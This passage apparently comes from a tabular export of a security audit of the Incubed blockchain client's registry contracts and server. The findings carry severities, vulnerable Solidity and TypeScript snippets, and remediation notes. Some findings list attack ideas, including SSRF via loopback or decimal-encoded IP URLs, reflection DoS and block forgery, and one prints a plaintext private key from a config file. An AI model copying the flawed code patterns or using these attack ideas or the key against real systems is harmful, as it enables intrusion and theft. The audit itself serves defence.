0x0000000000000000000000000000000100000000000000000000000000000000;\\n```\\n" +LibProxy.proxyCall() may overwrite important memory,low,"`LibProxy.proxyCall()` copies from call data to memory, starting at address 0:\\n```\\nassembly {\\n // store selector of destination function\\n let freeMemPtr := 0\\n if gt(customEgressSelector, 0) {\\n mstore(0x0, customEgressSelector)\\n freeMemPtr := add(freeMemPtr, 4)\\n }\\n\\n // adjust the calldata offset, if we should ignore the selector\\n let calldataOffset := 0\\n if gt(ignoreIngressSelector, 0) {\\n calldataOffset := 4\\n }\\n\\n // copy calldata to memory\\n calldatacopy(\\n freeMemPtr,\\n calldataOffset,\\n calldatasize()\\n )\\n```\\n\\nThe first 64 bytes of memory are treated as “scratch space” by the Solidity compiler. Writing beyond that point is dangerous, as it will overwrite the free memory pointer and the “zero slot” which is where length-0 arrays point.\\nAlthough the current callers of `proxyCall()` don't appear to use any memory after calling `proxyCall()`, future changes to the code may introduce very serious and subtle bugs due to this unsafe handling of memory.",Use the actual free memory pointer to determine where it's safe to write to memory.,,"```\\nassembly {\\n // store selector of destination function\\n let freeMemPtr := 0\\n if gt(customEgressSelector, 0) {\\n mstore(0x0, customEgressSelector)\\n freeMemPtr := add(freeMemPtr, 4)\\n }\\n\\n // adjust the calldata offset, if we should ignore the selector\\n let calldataOffset := 0\\n if gt(ignoreIngressSelector, 0) {\\n calldataOffset := 4\\n }\\n\\n // copy calldata to memory\\n calldatacopy(\\n freeMemPtr,\\n calldataOffset,\\n calldatasize()\\n )\\n```\\n" +"NodeRegistry - URL can be arbitrary dns resolvable names, IP's and even localhost or private subnets",high,"As outlined in issue 6.9 the `NodeRegistry` allows anyone to register nodes with arbitrary URLs. The `url` is then used by `in3-server` or clients to connect to other nodes in the system. Signers can only be convicted if they sign wrong blockhashes. However, if they never provide any signatures they can stay in the registry for as long as they want and sabotage the network. The Registry implements an admin functionality that is available for the first year to remove misbehaving nodes (or spam entries) from the Registry. However, this is insufficient as an attacker might just re-register nodes after the minimum timeout they specify or spend some more finneys on registering more nodes. Depending on the eth-price this will be more or less profitable.\\nFrom an attackers perspective the `NodeRegistry` is a good source of information for reconnaissance, allows to de-anonymize and profile nodes based on dns entries or netblocks or responses to `in3_stats` (https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/49), makes a good list of target for DoS attacks on the system or makes it easy to exploit nodes for certain yet unknown security vulnerabilities.\\nSince nodes and potentially clients (not in scope) do not validate the rpc URL received from the `NodeRegistry` they will try to connect to whatever is stored in a nodes `url` entry.\\ncode/in3-server/src/chains/signatures.ts:L58-L75\\n```\\nconst config = nodes.nodes.find(\\_ => \\_.address.toLowerCase() === adr.toLowerCase())\\nif (!config) // TODO do we need to throw here or is it ok to simply not deliver the signature?\\n throw new Error('The ' + adr + ' does not exist within the current registered active nodeList!')\\n\\n// get cache signatures and remaining blocks that have no signatures\\nconst cachedSignatures: Signature[] = []\\nconst blocksToRequest = blocks.filter(b => {\\n const s = signatureCaches.get(b.hash) && false\\n return s ? cachedSignatures.push(s) \\* 0 : true\\n})\\n\\n// send the sign-request\\nlet response: RPCResponse\\ntry {\\n response = (blocksToRequest.length\\n ? await handler.transport.handle(config.url, { id: handler.counter++ || 1, jsonrpc: '2.0', method: 'in3\\_sign', params: blocksToRequest })\\n : { result: [] }) as RPCResponse\\n if (response.error) {\\n```\\n\\nThis allows for a wide range of attacks not limited to:\\nAn attacker might register a node with an empty or invalid URL. The `in3-server` does not validate the URL and therefore will attempt to connect to the invalid URL, spending resources (cpu, file-descriptors, ..) to find out that it is invalid.\\nAn attacker might register a node with a URL that is pointing to another node's rpc endpoint and specify weights that suggest that it is capable of service a lot of requests to draw more traffic towards that node in an attempt to cause a DoS situation.\\nAn attacker might register a node for a http/https website at any port in an extortion attempt directed to website owners. The incubed network nodes will have to learn themselves that the URL is invalid and they will at least attempt to connect the website once.\\nAn attacker might update the node information in the `NodeRegistry` for a specific node every block, providing a new `url` (or a slightly different URLs issue 6.9) to avoid client/node URL blacklists.\\nAn attacker might provide IP addresses instead of DNS resolvable names with the `url` in an attempt to draw traffic to targets, avoiding canonicalization and blacklisting features.\\nAn attacker might provide a URL that points to private IP netblocks for IPv4 or IPv6 in various formats. Combined with the ability to ask another node to connect to an attacker defined `url` (via blockproof, signatures[] -> signer_address -> signer.url) this might allow an attacker to enumerate services in the LAN of node operators.\\nAn attacker might provide the loopback IPv4, IPv6 or resolvable name as the URL in an attempt to make the node connect to local loopback services (service discovery, bypassing authentication for some local running services - however this is very limited to the requests nodes may execute).\\nURLs may be provided in various formats: resolvable dns names, IPv4, IPv6 and depending on the http handler implementation even in Decimal, Hex or Octal form (i.e. http://2130706433/)\\nA valid DNS resolvable name might point to a localhost or private IP netblock.\\nSince none of the rpc endpoints provide signatures they cannot be convicted or removed (unless the `unregisterKey` does it within the first year. However, that will not solve the problem that someone can re-register the same URLs over and over again)","Resolution\\nThis issue has been addressed with the following commits:\\nIt is a design decision to base the Node registry on URLs (DNS resolvable names). This has the implications outlined in this issue and they cannot easily be mitigated. Adding a delay until nodes can be used after registration only delays the problem. Assuming that an entity curates the registry or a whitelist is in place centralizes the system. Adding DNS record verification still allows an owner of a DNS entry to point its name to any IP address they would like it to point to. It certainly makes it harder to add RPC URLs with DNS names that are not in control of the attacker but it also adds a whole lot more complexity to the system (including manual steps performed by the node operator). In the end, the system allows IP based URLs in the registry which cannot be used for DNS validation.\\nIt is a fundamental design decision of the system architecture to allow rpc urls in the Node Registry, therefore this issue can only be partially mitigated unless the system design is reworked. It is therefore suggested to add checks to both the registry contract (coarse validation to avoid adding invalid urls) and node implementations (rigorous validation of URL's and resolved IP addresses) and filter out any potentially harmful destinations.",,"```\\nconst config = nodes.nodes.find(\\_ => \\_.address.toLowerCase() === adr.toLowerCase())\\nif (!config) // TODO do we need to throw here or is it ok to simply not deliver the signature?\\n throw new Error('The ' + adr + ' does not exist within the current registered active nodeList!')\\n\\n// get cache signatures and remaining blocks that have no signatures\\nconst cachedSignatures: Signature[] = []\\nconst blocksToRequest = blocks.filter(b => {\\n const s = signatureCaches.get(b.hash) && false\\n return s ? cachedSignatures.push(s) \\* 0 : true\\n})\\n\\n// send the sign-request\\nlet response: RPCResponse\\ntry {\\n response = (blocksToRequest.length\\n ? await handler.transport.handle(config.url, { id: handler.counter++ || 1, jsonrpc: '2.0', method: 'in3\\_sign', params: blocksToRequest })\\n : { result: [] }) as RPCResponse\\n if (response.error) {\\n```\\n" +in3-server - key management Pending,high,"Secure and efficient key management is a challenge for any cryptographic system. Incubed nodes for example require an account on the ethereum blockchain to actively participate in the incubed network. The account and therefore a private-key is used to sign transactions on the ethereum blockchain and to provide signed proofs to other in3-nodes.\\nThis means that an attacker that is able to discover the keys used by an `in3-server` by any mechanism may be able to impersonate that node, steal the nodes funds or sign wrong data on behalf of the node which might also lead to a loss of funds.\\nThe private key for the `in3-server` can be specified in a configuration file called `config.json` residing in the program working dir. Settings from the `config.json` can be overridden via command-line options. The application keeps configuration parameters available internally in an `IN3RPCConfig` object and passes this object as an initialization parameter to other objects.\\nThe key can either be provided in plaintext as a hex-string starting with `0x` or within an ethereum keystore format compatible protected keystore file. Either way it is provided it will be held in plaintext in the object.\\nThe application accepts plaintext private keys and the keys are stored unprotected in the applications memory in JavaScript objects. The `in3-server` might even re-use the nodes private key which may weaken the security provided by the node. The repository leaks a series of presumably ‘test private keys' and the default config file already comes with a private key set that might be shared across unvary users that fail to override it.\\ncode/in3-server/config.json:L1-L4\\n```\\n{\\n ""privateKey"": ""0xc858a0f49ce12df65031ba0eb0b353abc74f93f8ccd43df9682fd2e2293a4db3"",\\n ""rpcUrl"": ""http://rpc-kovan.slock.it""\\n}\\n```\\n\\ncode/in3-server/package.json:L20-L31\\nThe private key is also passed as arguments to other functions. In error cases these may leak the private key to log interfaces or remote log aggregation instances (sentry). See `txargs.privateKey` in the example below:\\ncode/in3-server/src/util/tx.ts:L100-L100\\n```\\nconst key = toBuffer(txargs.privateKey)\\n```\\n\\ncode/in3-server/src/util/tx.ts:L134-L140\\n```\\nconst txHash = await transport.handle(url, {\\n jsonrpc: '2.0',\\n id: idCount++,\\n method: 'eth\\_sendRawTransaction',\\n params: [toHex(tx.serialize())]\\n}).then((\\_: RPCResponse) => \\_.error ? Promise.reject(new SentryError('Error sending tx', 'tx\\_error', 'Error sending the tx ' + JSON.stringify(txargs) + ':' + JSON.stringify(\\_.error))) as any : \\_.result + '')\\n```\\n","Resolution\\nThe breakdown of the fixes addressed with git.slock.it/PR/13 are as follows:\\nKeys should never be stored or accepted in plaintext format Keys should only be accepted in an encrypted and protected format\\nThe private key in `code/in3-server/config.json` has been removed. The repository still contains private keys at least in the following locations:\\n`package.json`\\n`vscode/launch.json`\\n`example_docker-compose.yml`\\nNote that private keys indexed by a git repository can be restored from the repository history.\\nThe following statement has been provided to address this issue:\\nWe have removed all examples and usage of plain private keys and replaced them with json-keystore files. Also in the documentation we added warnings on how to deal with keys, especially with hints to the bash history or enviroment\\n\\nA single key should be used for only one purpose. Keys should not be shared.\\nThe following statement has been provided to address this issue:\\nThis is why we seperated the owner and signer-key. This way you can use a multisig to securly protect the owner-key. The signer-key is used to sign blocks (and convict) and is not able to do anything else (not even changing its own url)\\n\\nThe application should support developers in understanding where cryptographic keys are stored within the application as well as in which memory regions they might be accessible for other applications\\nAddressed by wrapping the private key in an object that stores the key in encrypted form and only decrypts it when signing. The key is cleared after usage. The IN3-server still allows raw private keys to be configured. A warning is printed if that is the case. The loaded raw private key is temporarily assigned to a local variable and not explicitly cleared by the method.\\nWhile we used to keep the unlocked key as part of the config, we have now removed the key from the config and store them in a special signer-function.\\nhttps://git.slock.it/in3/ts/in3-server/merge_requests/113\\n\\nKeys should be protected in memory and only decrypted for the duration of time they are actively used. Keys should not be stored with the applications source-code repository\\nsee previous remediation note.\\nAfter unlocking the signer key, we encrypt it again and keep it encrypted only decrypting it when signing. This way the raw private key only exist for a very short time in memory and will be filled with 0 right after. ( https://git.slock.it/in3/ts/in3-server/merge_requests/113/diffs#653b04fa41e35b55181776b9f14620b661cff64c_54_73 )\\n\\nUse standard libraries for cryptographic operations\\nThe following statement has been provided to address this issue\\nWe are using ethereumjs-libs.\\n\\nUse the system keystore and API to sign and avoid to store key material at all\\nThe following statement has been provided to address this issue\\nWe are looking into using different signer-apis, even supporting hardware-modules like HSMs. But this may happen in future releases.\\n\\nThe application should store the keys eth-address (util.getAddress()) instead of re-calculating it multiple times from the private key.\\nFixed by generating the address for a private key once and storing it in a private key wrapper object.\\n\\nDo not leak credentials and key material in debug-mode, to local log-output or external log aggregators.\\n`txArgs` still contains a field `privateKey` as outlined in the issue description. However, this `privateKey` now represents the wrapper object noted in a previous comment which only provides access to the ETH address generated from the raw private key.\\nThe following statement has been provided to address this issue:\\nsince the private key and the passphrase are actually deleted from the config, logoutputs or even debug will not be able to leak this information.\\nKeys should never be stored or accepted in plaintext format.\\nKeys should not be stored in plaintext on the file-system as they might easily be exposed to other users. Credentials on the file-system must be tightly restricted by access control.\\nKeys should not be provided as plaintext via environment variables as this might make them available to other processes sharing the same environment (child-processes, e.g. same shell session)\\nKeys should not be provided as plaintext via command-line arguments as they might persist in the shell's command history or might be available to privileged system accounts that can query other processes startup parameters.\\nKeys should only be accepted in an encrypted and protected format.\\nA single key should be used for only one purpose. Keys should not be shared.\\nThe use of the same key for two different cryptographic processes may weaken the security provided by one or both of the processes.\\nThe use of the same key for two different applications may weaken the security provided by one or both of the applications.\\nLimiting the use of a key limits the damage that could be done if the key is compromised.\\nNode owners keys should not be re-used as signer keys.\\nThe application should support developers in understanding where cryptographic keys are stored within the application as well as in which memory regions they might be accessible for other applications.\\nKeys should be protected in memory and only decrypted for the duration of time they are actively used.\\nKeys should not be stored with the applications source-code repository.\\nUse standard libraries for cryptographic operations.\\nUse the system keystore and API to sign and avoid to store key material at all.\\nThe application should store the keys eth-address (util.getAddress()) instead of re-calculating it multiple times from the private key.\\nDo not leak credentials and key material in debug-mode, to local log-output or external log aggregators.",,"```\\n{\\n ""privateKey"": ""0xc858a0f49ce12df65031ba0eb0b353abc74f93f8ccd43df9682fd2e2293a4db3"",\\n ""rpcUrl"": ""http://rpc-kovan.slock.it""\\n}\\n```\\n" +NodeRegistry - Multiple nodes can share slightly different RPC URL,high,"One of the requirements for Node registration is to have a unique URL which is not already used by a different owner. The uniqueness check is done by hashing the provided `_url` and checking if someone already registered with that hash of `_url`.\\nHowever, byte-equality checks (via hashing in this case) to enforce uniqueness will not work for URLs. For example, while the following URLs are not equal and will result in different `urlHashes` they can logically be the same end-point:\\n`https://some-server.com/in3-rpc`\\n`https://some-server.com:443/in3-rpc`\\n`https://some-server.com/in3-rpc/`\\n`https://some-server.com/in3-rpc///`\\n`https://some-server.com/in3-rpc?something`\\n`https://some-server.com/in3-rpc?something&something`\\n`https://www.some-server.com/in3-rpc?something` (if www resolves to the same ip)\\n```\\nbytes32 urlHash = keccak256(bytes(\\_url));\\n\\n// make sure this url and also this owner was not registered before.\\n// solium-disable-next-line\\nrequire(!urlIndex[urlHash].used && signerIndex[\\_signer].stage == Stages.NotInUse,\\n ""a node with the same url or signer is already registered"");\\n```\\n\\nThis leads to the following attack vectors:\\nA user signs up multiple nodes that resolve to the same end-point (URL). A minimum deposit of `0.01 ether` is required for each registration. Registering multiple nodes for the same end-point might allow an attacker to increase their chance of being picked to provide proofs. Registering multiple nodes requires unique `signer` addresses per node.\\nAlso one node can have multiple accounts, hence one node can have slightly different URL and different accounts as the signers.\\nDoS - A user might register nodes for URLs that do not serve in3-clients in an attempt to DDoS e.g. in an attempt to extort web-site operators. This is kind of a reflection attack where nodes will request other nodes from the contract and try to contact them over RPC. Since it is http-rpc it will consume resources on the receiving end.\\nDoS - A user might register Nodes with RPC URLs of other nodes, manipulating weights to cause more traffic than the node can actually handle. Nodes will try to communicate with that node. If no proof is requested the node will not even know that someone else signed up other nodes with their RPC URL to cause problems. If they request proof the original `signer` will return a signed proof and the node will fail due to a signature mismatch. However, the node cannot be convicted and therefore forced to lose the deposit as conviction is bound the `signer` and the block was not signed by the rogue node entry. There will be no way to remove the node from the registry other than the admin functionality.","Canonicalize URLs, but that will not completely prevent someone from registering nodes for other end-points or websites. Nodes can be removed by an admin in the first year but not after that. Rogue owners cannot be prevented from registering random nodes with high weights and minimum deposit. They cannot be convicted as they do not serve proofs. Rogue owners can still unregister to receive their deposit after messing with the system.",,"```\\nbytes32 urlHash = keccak256(bytes(\\_url));\\n\\n// make sure this url and also this owner was not registered before.\\n// solium-disable-next-line\\nrequire(!urlIndex[urlHash].used && signerIndex[\\_signer].stage == Stages.NotInUse,\\n ""a node with the same url or signer is already registered"");\\n```\\n" +Impossible to remove malicious nodes after the initial period,medium,"The system has centralized power structure for the first year after deployment. An `unregisterKey` (creator of the contract) is allowed to remove Nodes that are in state `Stages.Active` from the registry, only in 1st year.\\nHowever, there is no possibility to remove malicious nodes from the registry after that.\\n```\\n/// @dev only callable in the 1st year after deployment\\nfunction removeNodeFromRegistry(address \\_signer)\\n external\\n onlyActiveState(\\_signer)\\n{\\n\\n // solium-disable-next-line security/no-block-members\\n require(block.timestamp < (blockTimeStampDeployment + YEAR\\_DEFINITION), ""only in 1st year"");// solhint-disable-line not-rely-on-time\\n require(msg.sender == unregisterKey, ""only unregisterKey is allowed to remove nodes"");\\n\\n SignerInformation storage si = signerIndex[\\_signer];\\n In3Node memory n = nodes[si.index];\\n\\n unregisterNodeInternal(si, n);\\n\\n}\\n```\\n","Resolution\\nThis issue has been addressed with a large change-set that splits the NodeRegistry into two contracts, which results in a code flow that mitigates this issue by making the logic contract upgradable (after 47 days of notice). The resolution adds more complexity to the system, and this complexity is not covered by the original audit. Splitting up the contracts has the side-effect of events being emitted by two different contracts, requiring nodes to subscribe to both contracts' events.\\nThe need for removing malicious nodes from the registry, arises from the design decision to allow anyone to register any URL. These URLs might not actually belong to the registrar of the URL and might not be IN3 nodes. This is partially mitigated by a centralization feature introduced in the mitigation phase that implements whitelist functionality for adding nodes.\\nWe generally advocate against adding complexity, centralization and upgrading mechanisms that can allow one party to misuse functionalities of the contract system for their benefit (e.g. `adminSetNodeDeposit` is only used to reset the deposit but allows the Logic contract to set any deposit; the logic contract is set by the owner and there is a 47 day timelock).\\nWe believe the solution to this issue, should have not been this complex. The trust model of the system is changed with this solution, now the logic contract can allow the admin a wide range of control over the system state and data.\\nThe following statement has been provided with the change-set:\\nDuring the 1st year, we will keep the current mechanic even though it's a centralized approach. However, we changed the structure of the smart contracts and separated the NodeRegistry into two different smart contracts: NodeRegistryLogic and NodeRegistryData. After a successful deployment only the NodeRegistryLogic-contract is able to write data into the NodeRegistryData-contract. This way, we can keep the stored data (e.g. the nodeList) in the NodeRegistryData-contract while changing the way the data gets added/updated/removed is handled in the NodeRegistryLogic-contract. We also provided a function to update the NodeRegistryLogic-contract, so that we are able to change to a better solution for removing nodes in an updated contract.\\nProvide a solution for the network to remove fraudulent node entries. This could be done by voting mechanism (with staking, etc).",,"```\\n/// @dev only callable in the 1st year after deployment\\nfunction removeNodeFromRegistry(address \\_signer)\\n external\\n onlyActiveState(\\_signer)\\n{\\n\\n // solium-disable-next-line security/no-block-members\\n require(block.timestamp < (blockTimeStampDeployment + YEAR\\_DEFINITION), ""only in 1st year"");// solhint-disable-line not-rely-on-time\\n require(msg.sender == unregisterKey, ""only unregisterKey is allowed to remove nodes"");\\n\\n SignerInformation storage si = signerIndex[\\_signer];\\n In3Node memory n = nodes[si.index];\\n\\n unregisterNodeInternal(si, n);\\n\\n}\\n```\\n" +NodeRegistry.registerNodeFor() no replay protection and expiration Won't Fix,medium,"An owner can register a node with the signer not being the owner by calling `registerNodeFor`. The owner submits a message signed for the owner including the properties of the node including the url.\\nThe signed data does not include the `registryID` nor the NodeRegistry's address and can therefore be used by the owner to submit the same node to multiple registries or chains without the signers consent.\\nThe signed data does not expire and can be re-used by the owner indefinitely to submit the same node again to future contracts or the same contract after the node has been removed.\\nArguments are not validated in the external function (also see issue 6.17)\\n```\\nbytes32 tempHash = keccak256(\\n abi.encodePacked(\\n \\_url,\\n \\_props,\\n \\_timeout,\\n \\_weight,\\n msg.sender\\n )\\n);\\n```\\n",Include `registryID` and an expiration timestamp that is checked in the contract with the signed data. Validate function arguments.,,"```\\nbytes32 tempHash = keccak256(\\n abi.encodePacked(\\n \\_url,\\n \\_props,\\n \\_timeout,\\n \\_weight,\\n msg.sender\\n )\\n);\\n```\\n" +BlockhashRegistry - Structure of provided blockheaders should be validated,medium,"`getParentAndBlockhash` takes an rlp-encoded blockheader blob, extracts the parent parent hash and returns both the parent hash and the calculated blockhash of the provided data. The method is used to add blockhashes to the registry that are older than 256 blocks as they are not available to the evm directly. This is done by establishing a trust-chain from a blockhash that is already in the registry up to an older block\\nThe method assumes that valid rlp encoded data is provided but the structure is not verified (rlp decodes completely; block number is correct; timestamp is younger than prevs, …), giving a wide range of freedom to an attacker with enough hashing power (or exploiting potential future issues with keccak) to forge blocks that would never be accepted by clients, but may be accepted by this smart contract. (threat: mining pool forging arbitrary non-conformant blocks to exploit the BlockhashRegistry)\\nIt is not checked that input was actually provided. However, accessing an array at an invalid index will raise an exception in the EVM. Providing a single byte > `0xf7` will yield a result and succeed even though it would have never been accepted by a real node.\\nIt is assumed that the first byte is the rlp encoded length byte and an offset into the provided `_blockheader` bytes-array is calculated. Memory is subsequently accessed via a low-level `mload` at this calculated offset. However, it is never validated that the offset actually lies within the provided range of bytes `_blockheader` leading to an out-of-bounds memory read access.\\nThe rlp encoded data is only partially decoded. For the first rlp list the number of length bytes is extracted. For the rlp encoded long string a length byte of 1 is assumed. The inline comment appears to be inaccurate or might be misleading. `// we also have to add ""2"" = 1 byte to it to skip the length-information`\\nInvalid intermediary blocks (e.g. with parent hash 0x00) will be accepted potentially allowing an attacker to optimize the effort needed to forge invalid blocks skipping to the desired blocknumber overwriting a certain blockhash (see issue 6.18)\\nWith one collisions (very unlikely) an attacker can add arbitrary or even random values to the BlockchainRegistry. The parent-hash of the starting blockheader cannot be verified by the contract ([target_block_random]<--parent_hash--[rnd]<--parent_hash--[rnd]<--parent_hash--...<--parent_hash--[collision]<--parent_hash_collission--[anchor_block]). While nodes can verify block structure and bail on invalid structure and check the first blocks hash and make sure the chain is in-tact the contract can't. Therefore one cannot assume the same trust in the blockchain registry when recreating blocks compared to running a full node.\\n```\\nfunction getParentAndBlockhash(bytes memory \\_blockheader) public pure returns (bytes32 parentHash, bytes32 bhash) {\\n\\n /// we need the 1st byte of the blockheader to calculate the position of the parentHash\\n uint8 first = uint8(\\_blockheader[0]);\\n\\n /// calculates the offset\\n /// by using the 1st byte (usually f9) and substracting f7 to get the start point of the parentHash information\\n /// we also have to add ""2"" = 1 byte to it to skip the length-information\\n require(first > 0xf7, ""invalid offset"");\\n uint8 offset = first - 0xf7 + 2;\\n\\n /// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n // solium-disable-next-line security/no-inline-assembly\\n assembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n }\\n bhash = keccak256(\\_blockheader);\\n```\\n",Validate that the provided data is within a sane range of bytes that is expected (min/max blockheader sizes).\\nValidate that the provided data is actually an rlp encoded blockheader.\\nValidate that the offset for the parent Hash is within the provided data.\\nValidate that the parent Hash is non zero.\\nValidate that blockhashes do not repeat.,,"```\\nfunction getParentAndBlockhash(bytes memory \\_blockheader) public pure returns (bytes32 parentHash, bytes32 bhash) {\\n\\n /// we need the 1st byte of the blockheader to calculate the position of the parentHash\\n uint8 first = uint8(\\_blockheader[0]);\\n\\n /// calculates the offset\\n /// by using the 1st byte (usually f9) and substracting f7 to get the start point of the parentHash information\\n /// we also have to add ""2"" = 1 byte to it to skip the length-information\\n require(first > 0xf7, ""invalid offset"");\\n uint8 offset = first - 0xf7 + 2;\\n\\n /// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n // solium-disable-next-line security/no-inline-assembly\\n assembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n }\\n bhash = keccak256(\\_blockheader);\\n```\\n" +Registries - Incomplete input validation and inconsistent order of validations Pending,medium,"Methods and Functions usually live in one of two worlds:\\n`public` API - methods declared with visibility `public` or `external` exposed for interaction by other parties\\n`internal` API - methods declared with visibility `internal`, `private` that are not exposed for interaction by other parties\\nWhile it is good practice to visually distinguish internal from public API by following commonly accepted naming convention e.g. by prefixing internal functions with an underscore (_doSomething vs. doSomething) or adding the keyword `unsafe` to `unsafe` functions that are not performing checks and may have a dramatic effect to the system (_unsafePayout vs. RequestPayout), it is important to properly verify that inputs to methods are within expected ranges for the implementation.\\nInput validation checks should be explicit and well documented as part of the code's documentation. This is to make sure that smart-contracts are robust against erroneous inputs and reduce the potential attack surface for exploitation.\\nIt is good practice to verify the methods input as early as possible and only perform further actions if the validation succeeds. Methods can be split into an external or public API that performs initial checks and subsequently calls an internal method that performs the action.\\nThe following lists some public API methods that are not properly checking the provided data:\\n`BlockhashRegistry.reCalculateBlockheaders` - bhash can be zero; blockheaders can be empty\\nBlockhashRegistry.getParentAndBlockhash- blockheader structure can be random as long as parenthash can be extracted\\n`BlockhashRegistry.recreateBlockheaders` - blockheaders can be empty; Arguments should be validated before calculating values that depend on them:\\n```\\nassert(\\_blockNumber > \\_blockheaders.length);\\n```\\n\\n`BlockhashRegistry.searchForAvailableBlock` - `_startNumber + _numBlocks` can be > `block.number; _startNumber + _numBlocks` can overflow.\\n`NodeRegistry.removeNode` - should check `require(_nodeIndex < nodes.length)` first before any other action.\\n```\\nfunction removeNode(uint \\_nodeIndex) internal {\\n // trigger event\\n emit LogNodeRemoved(nodes[\\_nodeIndex].url, nodes[\\_nodeIndex].signer);\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(nodes[\\_nodeIndex].url))];\\n uint length = nodes.length;\\n\\n assert(length > 0);\\n```\\n\\n`NodeRegistry.registerNodeFor` - Signature version `v` should be checked to be either `27 || 28` before verifying it.\\n```\\nfunction registerNodeFor(\\n string calldata \\_url,\\n uint64 \\_props,\\n uint64 \\_timeout,\\n address \\_signer,\\n uint64 \\_weight,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n)\\n external\\n payable\\n{\\n```\\n\\n`NodeRegistry.revealConvict` - unchecked `signer`\\n```\\nSignerInformation storage si = signerIndex[\\_signer];\\n```\\n\\n`NodeRegistry.revealConvict` - signer status can be checked earlier.\\n```\\nrequire(si.stage != Stages.Convicted, ""node already convicted"");\\n```\\n\\n`NodeRegistry.updateNode` - the check if the `newURL` is registered can be done earlier\\n```\\nrequire(!urlIndex[newURl].used, ""url is already in use"");\\n```\\n",Use Checks-Effects-Interactions pattern for all functions.,,```\\nassert(\\_blockNumber > \\_blockheaders.length);\\n```\\n +BlockhashRegistry - recreateBlockheaders allows invalid parent hashes for intermediary blocks,medium,"It is assumed that a blockhash of `0x00` is invalid, but the method accepts intermediary parent hashes extracted from blockheaders that are zero when establishing the trust chain.\\n`recreateBlockheaders` relies on `reCalculateBlockheaders` to correctly establish a chain of trust from the provided list of `_blockheaders` to a valid blockhash stored in the contract. However, `reCalculateBlockheaders` fails to raise an exception in case `getParentAndBlockhash` returns a blockhash of `0x00`. Subsequently it will skip over invalid blockhashes and continue to establish the trust chain without raising an error.\\nThis may allow an attacker with enough hashing power to store a blockheader hash that is actually invalid on the real chain but accepted within this smart contract. This may even only be done temporarily to overwrite an existing hash for a short period of time (see https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/24).\\n```\\nfor (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n}\\n```\\n",Stop processing the array of `_blockheaders` immediately if a blockheader is invalid.,,"```\\nfor (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n}\\n```\\n" +BlockhashRegistry - recreateBlockheaders succeeds and emits an event even though no blockheaders have been provided,medium,"The method is used to re-create blockhashes from a list of rlp-encoded `_blockheaders`. However, the method never checks if `_blockheaders` actually contains items. The result is, that the method will unnecessarily store the same value that is already in the `blockhashMapping` at the same location and wrongly log `LogBlockhashAdded` even though nothing has been added nor changed.\\nassume `_blockheaders` is empty and the registry already knows the blockhash of `_blockNumber`\\n```\\nfunction recreateBlockheaders(uint \\_blockNumber, bytes[] memory \\_blockheaders) public {\\n\\n bytes32 currentBlockhash = blockhashMapping[\\_blockNumber];\\n require(currentBlockhash != 0x0, ""parentBlock is not available"");\\n\\n bytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n require(calculatedHash != 0x0, ""invalid headers"");\\n```\\n\\nAn attempt is made to re-calculate the hash of an empty `_blockheaders` array (also passing the `currentBlockhash` from the registry)\\n```\\nbytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n```\\n\\nThe following loop in `reCalculateBlockheaders` is skipped and the `currentBlockhash` is returned.\\n```\\nfunction reCalculateBlockheaders(bytes[] memory \\_blockheaders, bytes32 \\_bHash) public pure returns (bytes32 bhash) {\\n\\n bytes32 currentBlockhash = \\_bHash;\\n bytes32 calcParent = 0x0;\\n bytes32 calcBlockhash = 0x0;\\n\\n /// save to use for up to 200 blocks, exponential increase of gas-usage afterwards\\n for (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n }\\n\\n return currentBlockhash;\\n```\\n\\nThe assertion does not fire, the `bnr` to store the `calculatedHash` is the same as the one initially provided to the method as an argument.. Nothing has changed but an event is emitted.\\n```\\n /// we should never fail this assert, as this would mean that we were able to recreate a invalid blockchain\\n assert(\\_blockNumber > \\_blockheaders.length);\\n uint bnr = \\_blockNumber - \\_blockheaders.length;\\n blockhashMapping[bnr] = calculatedHash;\\n emit LogBlockhashAdded(bnr, calculatedHash);\\n}\\n```\\n","The method is crucial for the system to work correctly and must be tightly controlled by input validation. It should not be allowed to overwrite an existing value in the contract (issue 6.29) or emit an event even though nothing has happened. Therefore validate that user provided input is within safe bounds. In this case, that at least one `_blockheader` has been provided. Validate that `_blockNumber` is less than `block.number` and do not expect that parts of the code will throw and safe the contract from exploitation.",,"```\\nfunction recreateBlockheaders(uint \\_blockNumber, bytes[] memory \\_blockheaders) public {\\n\\n bytes32 currentBlockhash = blockhashMapping[\\_blockNumber];\\n require(currentBlockhash != 0x0, ""parentBlock is not available"");\\n\\n bytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n require(calculatedHash != 0x0, ""invalid headers"");\\n```\\n" +NodeRegistry.updateNode replaces signer with owner and emits inconsistent events,medium,"When the `owner` calls `updateNode()` function providing a new `url` for the node, 